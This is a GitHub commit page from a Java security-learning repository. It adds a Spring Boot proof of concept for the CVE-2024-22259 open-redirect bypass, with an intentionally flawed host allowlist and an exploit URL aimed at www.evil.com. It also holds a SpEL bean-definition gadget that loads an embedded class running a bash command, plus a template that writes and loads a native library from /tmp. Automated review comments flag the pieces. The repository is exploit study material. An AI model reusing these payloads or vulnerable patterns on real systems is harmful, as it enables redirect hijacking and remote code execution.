:new:CVE-2024-22259 · bbbfkl/JavaSecurityLearning@36ee9bc · GitHub

Commit 36ee9bc

committed
1 parent 8684def commit 36ee9bc

8 files changed

Lines changed: 198 additions & 0 deletions


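--- /dev/null
+++ b/pom.xml
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+<parent>
+<groupId>org.springframework.boot</groupId>
+<artifactId>spring-boot-starter-parent</artifactId>
+<version>2.7.18</version>
+<relativePath/> <!-- lookup parent from repository -->
+</parent>
+<modelVersion>4.0.0</modelVersion>
+
+<artifactId>spring-uricomponentsbuilder-2</artifactId>
+
+<properties>
+<maven.compiler.source>8</maven.compiler.source>
+<maven.compiler.target>8</maven.compiler.target>
+</properties>
+
+<dependencies>
+<dependency>
+<groupId>org.springframework.boot</groupId>
+<artifactId>spring-boot-starter-web</artifactId>
+</dependency>
+<!-- https://mvnrepository.com/artifact/org.springframework/spring-web -->
+<dependency>
+<groupId>org.springframework</groupId>
+<artifactId>spring-web</artifactId>
+<version>5.3.32</version>
+</dependency>
+</dependencies>
+
+</project>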
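Review bot: The explicit `<version>5.3.32</version>` on spring-web (file lines 26-30) overrides the framework version managed by the spring-boot-starter-parent 2.7.18 import, and the OAuthController header in this same commit names 5.3.33 as the release that fixes CVE-2024-22259, so this pin deliberately selects a build that is still affected. That is the right thing for a reproduction module, but nothing in the pom says so, and a reader reusing this module as a Boot template would silently carry the pin along. Add `<!-- Intentionally pinned to a spring-web release affected by CVE-2024-22259 (fixed in 5.3.33) for the PoC; do not reuse this pin elsewhere -->` above the dependency.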
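--- /dev/null
+++ b/src/main/java/com/drunkbaby/Cve202422259Application.java
@@ -0,0 +1,13 @@
+package com.drunkbaby;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Cve202422259Application {
+
+public static void main(String[] args) {
+SpringApplication.run(Cve202422259Application.class, args);
+}
+
+}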
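--- /dev/null
+++ b/src/main/java/com/drunkbaby/controller/OAuthController.java
@@ -0,0 +1,74 @@
+package com.drunkbaby.controller;
+
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.util.UriComponents;
+import org.springframework.web.util.UriComponentsBuilder;
+
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+import java.util.Arrays;
+import java.util.HashSet;
+import java.util.Set;
+
+/**
+* @author threedr3am
+*
+* CVE-2024-22259
+*
+* 使用UricomponentsBuilder解析外部提供的URL(例如通过查询参数)并对解析URL的主机执行验证检查的应用程序可能容易受到公开重定向攻击,
+* 如果在通过验证检查后使用该URL,则可能容易受到SSRF攻击。
+* 这与CVE-2024-22243相同,这是另一种输入不同的情况。
+*
+* ### 修复方案
+* 1. 将 org.springframework:spring-web 升级至 6.1.5 及以上版本
+* 2. 将 org.springframework:spring-web 升级至 6.0.18 及以上版本
+* 3. 将 org.springframework:spring-web 升级至 5.3.33 及以上版本
+*
+* ### 参考链接
+* https://spring.io/security/cve-2024-22259
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-22259
+*
+*/
+@Controller
+@RequestMapping("/oauth")
+public class OAuthController {
+
+private static final Set<String> whiteDomains = new HashSet<>(Arrays.asList(new String[]{
+".fuckpdd.com"
+}));
+
+/**
+* 一般绕过oauth的host校验,可以开放重定向到恶意站点劫持code
+* 访问:http://127.0.0.1:8080/oauth?redirect_uri=http%3A%2F%2F%40www.fuckpdd.com%5B%40www.evil.com%2Ftou
+*
+*
+* @param redirectUri [CVE-2024-22259] -> http://@www.fuckpdd.com[@www.evil.com/tou
+* [CVE-2024-22243] -> http://www.fuckpdd.com[@www.evil.com/tou
+* @return
+*/
+@GetMapping
+public String oauth(@RequestParam(name = "redirect_uri") String redirectUri, HttpServletResponse response) throws IOException {
+UriComponents uriComponents = UriComponentsBuilder.fromUriString(redirectUri).build();
+String schema = uriComponents.getScheme();
+String host = uriComponents.getHost();
+String path = uriComponents.getPath();
+
+System.out.printf("schema:%s\n", schema);
+System.out.printf("host:%s\n", host);
+System.out.printf("path:%s\n", path);
+
+boolean pass = false;
+for (String whiteDomain : whiteDomains) {
+if (host.endsWith(whiteDomain)) {
+pass = true;
+break;
+}
+}
+if (!pass) return "error";
+
+return "redirect:" + redirectUri;
+}
+}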
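Review bot: `host.endsWith(whiteDomain)` at file line 65 dereferences `host` with no null check, and `UriComponents.getHost()` returns null for a relative or host-less `redirect_uri` such as `/foo`, so that input produces an NPE and a 500 instead of the `error` view; add `if (host == null) return "error";` directly after line 56. Separately, the allowlist decision is made on the parsed host while the redirect at line 72 is issued with the raw `redirectUri`, which is exactly the parse-versus-use mismatch the CVE exploits — the file is clearly meant as a vulnerable reproduction, so a `// VULNERABLE ON PURPOSE (CVE-2024-22259 PoC): do not copy this validation pattern` comment above the class would keep it from being lifted as a reference. For a hardened variant, beyond the spring-web upgrade the header lists, cross-check with a second parser (`new java.net.URI(redirectUri).getHost()`) and reject the request when the two hosts disagree or either is null, since the bypass depends on one parser seeing `www.fuckpdd.com` as the host while the client, per the payload in the Javadoc, resolves to `www.evil.com`. The `System.out.printf` lines are debugging output and would be a logger call outside a PoC.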
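--- /dev/null
+++ b/src/test/java/com/drunkbaby/Cve202422259ApplicationTests.java
@@ -0,0 +1,13 @@
+package com.drunkbaby;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class Cve202422259ApplicationTests {
+
+@Test
+void contextLoads() {
+}
+
+}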
Lines changed: 11 additions & 0 deletions
@@ -0,0 +1,11 @@
1+
<?xml version="1.0" encoding="UTF-8" ?>
2+
<beans xmlns="http://www.springframework.org/schema/beans"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
5+
<bean id="data" class="java.lang.String">
6+
<constructor-arg>
7+
<value>yv66vgAAADQAmwoAFwBaBwBbCABcCgAVAF0KAF4AXwoAXgBgCABhCgAVAGIKAAIAYwcAZAgAZQgAZggAZwcALQoACgBoCgBpAGoIAEMIAEQKABcAawgARQcAbAoAFQBtBwBuCgBvAHAHAHEKABkAcggAcwkAGQB0BwA/CQB1AHQKABUAdgoAbwBfCgAZAHcKACQAeAoAdQB5BwB6AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWkBAAFJAQADYXJnAQACW0IBAAR0aGlzAQAUTGNvbS9kcnVua2JhYnkvRXZpbDsBAA50aGVVbnNhZmVGaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAZ1bnNhZmUBABFMc3VuL21pc2MvVW5zYWZlOwEABWNsYXp6AQARTGphdmEvbGFuZy9DbGFzczsBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAANjbWQBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAHY21kQXJncwEAA1tbQgEABHNpemUBAAhhcmdCbG9jawEABGVudmMBAAJbSQEAB3N0ZF9mZHMBABRsYXVuY2hNZWNoYW5pc21GaWVsZAEAD2hlbHBlcnBhdGhGaWVsZAEAD2xhdW5jaE1lY2hhbmlzbQEACmhlbHBlcnBhdGgBAAdvcmRpbmFsAQAKZm9ya01ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQANU3RhY2tNYXBUYWJsZQcAegcAewcAWwcAbAcAbgcAOQcAOwEACkV4Y2VwdGlvbnMHAHwBAAl0b0NTdHJpbmcBABYoTGphdmEvbGFuZy9TdHJpbmc7KVtCAQABcwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABWJ5dGVzAQAGcmVzdWx0AQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwAJQAmAQAPc3VuL21pc2MvVW5zYWZlAQAJdGhlVW5zYWZlDAB9AH4HAHsMAH8AgAwAgQCCAQAVamF2YS5sYW5nLlVOSVhQcm9jZXNzDACDAIQMAIUAhgEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMBABJ0b3VjaCAvdG1wL3N1Y2Nlc3MMAIcAiAcAiQwAigCLDACMAI0BAA9qYXZhL2xhbmcvQ2xhc3MMAI4AjwEAEGphdmEvbGFuZy9PYmplY3QHAJAMAJEAkgEAEWphdmEvbGFuZy9JbnRlZ2VyDACTAJQBABBSQVNQX2ZvcmtBbmRFeGVjDACVADUHAJYMAJcAjwwAmACZDABSAFMMAJgAmgEAEmNvbS9kcnVua2JhYnkvRXZpbAEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsBABBhbGxvY2F0ZUluc3RhbmNlAQAlKExqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvT2JqZWN0OwEACGdldEJ5dGVzAQAEKClbQgEAEGphdmEvbGFuZy9TeXN0ZW0BAAlhcnJheWNvcHkBACooTGphdmEvbGFuZy9PYmplY3Q7SUxqYXZhL2xhbmcvT2JqZWN0O0lJKVYBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAlnZXRNZXRob2QBA
EAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIaW50VmFsdWUBAAMoKUkBAARUWVBFAQARamF2YS9sYW5nL0Jvb2xlYW4BABFnZXREZWNsYXJlZE1ldGhvZAEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAWKFopTGphdmEvbGFuZy9Cb29sZWFuOwAhACQAFwAAAAAAAgABACUAJgACACcAAAN6AAgAEgAAAcQqtwABEgISA7YABEwrBLYABSsBtgAGwAACTRIHuAAITiwttgAJOgQGvQAKWQMSC1NZBBIMU1kFEg1TOgUZBb4EZL0ADjoGGQa+NgcDNggVCBkGvqIAIxkGFQgZBRUIBGAytgAPUxUHGQYVCDK+YDYHhAgBp//bFQe8CDoIAzYJGQY6ChkKvjYLAzYMFQwVC6IAJxkKFQwyOg0ZDQMZCBUJGQ2+uAAQFQkZDb4EYGA2CYQMAaf/2AS8CjoKBrwKWQMCT1kEAk9ZBQJPOgstEhG2AAQ6DC0SErYABDoNGQwEtgAFGQ0EtgAFGQwZBLYABjoOGQ0ZBLYABsAADsAADjoPGQ62ABMSFAO9ABW2ABYZDgO9ABe2ABjAABm2ABo2EC0SGxAKvQAVWQOyABxTWQQSDlNZBRIOU1kGEg5TWQeyABxTWQgSDlNZEAayABxTWRAHEg5TWRAIEh1TWRAJsgAeU7YAHzoRGREEtgAgGREZBBAKvQAXWQMVEARguAAhU1kEGQ9TWQUqGQUDMrYAIlNZBhkIU1kHGQa+uAAhU1kIAVNZEAYZCgMuuAAhU1kQBwFTWRAIGQtTWRAJA7gAI1O2ABhXsQAAAAMAKAAAAIIAIAAAAAkABAAKAAwACwARAAwAGgAOACAADwAnABEAPAATAEYAFABLABYAVgAXAGUAGABwABYAdgAbAHwAHAB/AB4AmQAfAKYAIACwAB4AtgAjALsAJADMACYA1AAnANwAKQDiACoA6AAsAPEALQEAAC8BHwAxAWYAMgFsADMBwwA0ACkAAADKABQATgAoACoAKwAIAJkAFwAsAC0ADQAAAcQALgAvAAAADAG4ADAAMQABABoBqgAyADMAAgAgAaQANAA1AAMAJwGdADYANwAEADwBiAA4ADkABQBGAX4AOgA7AAYASwF5ADwAKwAHAHwBSAA9AC0ACAB/AUUAKgArAAkAuwEJAD4APwAKAMwA+ABAAD8ACwDUAPAAQQAxAAwA3ADoAEIAMQANAPEA0wBDADcADgEAAMQARAAtAA8BHwClAEUAKwAQAWYAXgBGAEcAEQBIAAAATAAE/wBOAAkHAEkHAEoHAEsHAEwHAE0HAE4HAE8BAQAA+gAn/wAUAA0HAEkHAEoHAEsHAEwHAE0HAE4HAE8BBwAOAQcATwEBAAD4ACoAUAAAAAQAAQBRAAEAUgBTAAEAJwAAAI0ABQAEAAAAJCvHAAUBsCu2AA9NLL4EYLwITiwDLQMsvrgAEC0tvgRkA1QtsAAAAAMAKAAAAB4ABwAAADcABAA4AAYAOgALADsAEgA8ABsAPQAiAD4AKQAAACoABAAAACQALgAvAAAAAAAkAFQAVQABAAsAGQBWAC0AAgASABIAVwAtAAMASAAAAAMAAQYAAQBYAAAAAgBZ</value>
8+
</constructor-arg>
9+
</bean>
10+
<bean class="#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.drunkbaby.Evil',T(org.springframework.util.Base64Utils).decodeFromString(data),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).newInstance()}"></bean>
11+
</beans>
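Review bot: Nothing else in this commit references this bean definition, and the `class="#{...}"` SpEL expression at file line 10 defines and instantiates an arbitrary class from the base64 `data` bean at context load; the constant pool visible in that blob appears to contain `java.lang.UNIXProcess`, `bash`, `-c` and `touch /tmp/success`, so loading this context looks like it runs a shell command. Its relationship to the CVE-2024-22259 open-redirect PoC is undocumented; add an XML comment at the top such as `<!-- Standalone SpEL bean-definition RCE gadget: defines and instantiates the embedded com.drunkbaby.Evil class on context load. Unrelated to the UriComponentsBuilder demo; never include in a deployed context. -->`. Note also that `Base64Utils.decodeFromString` delegates, as far as I know, to `java.util.Base64`'s basic decoder, which rejects line separators, so the `<value>` must remain a single line — the wrap shown in this rendering between the two halves of the blob would break decoding if it were committed as a newline.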
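--- /dev/null
+++ b/src/main/java/com/example/Evil.java
@@ -0,0 +1,14 @@
+package com.example;
+
+import java.nio.file.Files;
+import java.nio.file.Paths;
+import java.util.Base64;
+
+public class Evil {
+public Evil() throws Exception {
+String data = "PAYLOAD";
+String filename = "/tmp/evil.so";
+Files.write(Paths.get(filename), Base64.getDecoder().decode(data));
+System.load(filename);
+}
+}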
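Review bot: `Base64.getDecoder().decode(data)` at file line 11 throws `IllegalArgumentException` for any build where the placeholder is not replaced, because the 7-character literal `"PAYLOAD"` is not valid base64, and nothing in the file says it is a template; add `// Template: substitute PAYLOAD with the base64 of the shared object before compiling — the placeholder itself fails to decode.` above line 9. This class is `com.example.Evil`, while the blob in the SpEL bean definition in this commit names `com/drunkbaby/Evil`, so the two are not the same class and a one-line comment stating which one the demo actually loads would avoid confusion. Writing to the fixed, predictable path `/tmp/evil.so` with default permissions and then `System.load`ing it is also open to a local collision or symlink race by another user on the host, even in a lab; `Files.createTempFile` followed by an explicit delete after `System.load` avoids that.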
Lines changed: 7 additions & 0 deletions

0 commit comments

Comments
 (0)